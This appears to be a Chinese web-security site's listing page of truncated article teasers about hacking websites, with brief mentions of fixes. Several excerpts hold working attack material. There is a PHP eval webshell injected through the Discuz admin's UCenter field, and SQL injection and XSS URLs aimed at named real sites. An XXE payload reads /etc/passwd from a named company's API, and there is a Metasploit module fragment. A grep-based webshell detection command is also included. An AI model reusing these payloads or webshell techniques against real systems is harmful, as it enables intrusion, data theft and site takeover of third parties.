discuz X2.5后台拿shell及修复 - 网站安全 - 自学php关注热度:20

有管理员帐号及密码。直接在UCenter IP 地址:里面插入一句话xxoo\\);eval($_POST[a])?;// 就ok 然后菜刀连接http://www.2cto.com /config/config_ucenter.php密码a ，测试通过..[详情]

阿里校园多个漏洞及修复 - 网站安全 - 自学php关注热度:11

SQL注入，跨站什么的。。详细说明：1.SQL注入注入URL：http://www.alixiaoyuan.com/index.php?app=campusgroupbuycateID=1注入参数：cateID2.跨站http://wh.alixiaoyuan.com/?app=buycity_id=%22%20onmouseove.....[详情]

Linux shell快速查找PHP木马 - 网站安全 - 自学php关注热度:8

一句话查找 PHP 木马find ./ -name *.php |xargs egrep phpspy|c99sh|milw0rm|eval\(gunerpress|eval\(base64_decoolcode|spider_bc /tmp/php.txtgrep -r --include=*.php #39;[^a-z]eval($_P.....[详情]

以学校OA考勤系统服务器为目标的一次渗透检测关注热度:10

本人所在的是重庆某某软件学校，学校一共4台内部服务器，IP结构：10.0.0.2、10.0.0.4、10.0.0.5、10.0.0.103去年的时候由于10.0.0.103的sa为弱口令123456，被俺日下，后来通知校方处理了（确实处..[详情]

安全狗iis 6.0 ; 截断解析突破 - 网站安全 - 自学关注热度:16

众所周知web安全狗是国内比较流氓的软件，劫持模块，坑爹的删不了。除了这些流氓行为之外，还恬不知耻的做了各种没有用的限制！比如说注入安全狗本身对xx.asp?id=69 and 1=1和 xx.asp?..[详情]

方卡ISite企业建站系统V1.1.9上传绕过 - 网站安全关注热度:23

可以得到ewebedit。转而可以得到SHELL。开始只是得到了一个方卡在线的后台。可以修改上传类别。可惜有保护。改过了就又恢复了继续看。是一个新的网址后台管理软件。百度过了。几乎..[详情]

网站九大敌人 别给Web应用漏洞可趁之机 - 网站安关注热度:12

过去，网站的内容大多是静态的。随着HTML5的流行，Web应用进入一个崭新阶段，内容的动态化和实时共享让阻拦不良内容或恶意软件变得更加复杂，公司和个人的重要信息也被暴于极为危..[详情]

丢掉NC，介绍一种新的上传shell文件的方法 - 网站关注热度:15

www.2cto.com:以前的老文章了，站里没有，补上。今日低调在知道区发帖求助，说后台地址，用户名和密码都有，拿不到shell。不久wbxym和ljb17就分别2种办法上传好了shell。wbxym的方法很简单..[详情]

JBoss默认身份验证漏洞利用及修复 - 网站安全 -关注热度:33

JBoss应用服务器是一个开源的基于Java EE应用服务器。 JBoss被广泛使用，许多组织的web服务器都是由JBoss部署的。JBoss已经爆出过很多漏洞和错误，本文将分享JBoss应用程序默认身份验证漏..[详情]

客客族威客系统后台编辑模板处可写入shell - 网站关注热度:10

1、通过各种手段进入后台2、站长工具-模板标签-模板管理-编辑3、选择任意一个文件编辑之后你看到的是这个样子4、进行如图所示的修改，内容可以是大马也可以使小马，模板路径为相..[详情]

艾格中国（Etam）zend framework任意文件读取漏洞及关注热度:36

URL：http://www.etam.com.cn/api/xmlrpcpost数据:?xml version=1.0?!DOCTYPE foo [!ELEMENT methodName ANY !ENTITY xxe SYSTEM file:///etc/passwd ]methodCallmethodNamexxe;/me.....[详情]

记一次有趣的提权 - 网站安全 - 自学php关注热度:23

Shell是双面大牛给的，在我打算看《轩辕剑》的时候，面面大牛说我无聊就让我看看提权，俺立马没了兴趣，为啥，双面大牛都没有搞定的，我能搞定吗..但是发现这个网速看电影真的没..[详情]

YourArcadeScript 2.4 (index.php内id参数) SQL注射 - 网站安关注热度:13

YourArcadeScript 2.4 SQLi Vulnerability影响版本: 2.4作者: DaOne [LCA]下载地址: http://www.yourarcadescript.com测试http://www.2cto.com /index.php?act=catid=[Error Based Injection]致谢 :.....[详情]

Symantec Web Gateway <= 5.0.3.18任意密码修改(MSF)关注热度:7

### @_Kc57# Symantec Web Gateway = 5.0.3.18 Arbitrary Password Change##require #39;msf/core#39;class Metasploit3 Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def i.....[详情]

奇艺分站nginx解析+xss - 网站安全 - 自学php关注热度:11

http://vote.video.qiyi.com/survey/static/qiyi_logo.png/test.php nginx解析漏洞http://list.iqiyi.com/?1%3C/title%3E1%22/%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E xsshttp://top.iqiyi.com/index/t.....[详情]